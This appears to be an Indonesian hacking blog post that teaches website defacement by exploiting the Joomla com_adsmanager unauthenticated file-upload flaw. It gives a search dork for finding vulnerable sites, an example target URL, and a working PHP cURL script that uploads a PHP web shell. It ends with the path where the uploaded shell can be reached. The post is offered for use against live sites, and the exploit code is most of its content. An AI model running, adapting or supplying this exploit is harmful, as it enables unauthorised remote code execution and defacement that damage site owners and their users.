Deface dengan Exploit Joomla Com_Adsmanager Shell Upload

Hallo
Default dork : "com_adsmanager" site:sak karepmu
Exploit :synchronizer.co .li/index.php?option=com_adsmanager&task=upload
Vuln: ada tulisan anu
joomla.png
Default dork : "com_adsmanager" site:sak karepmu
Exploit :synchronizer.co .li/index.php?option=com_adsmanager&task=upload
Vuln: ada tulisan anu
$url = "http://annam.ganteng/index.php?option=com_adsmanager&task=upload"; // put URL Here
$post = array
(
"file" => "@haha.jpg",
"name" => "haha.php");
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell acces : target/tmp/plupload/shell.php

0 Response to "Deface dengan Exploit Joomla Com_Adsmanager Shell Upload"

Posting Komentar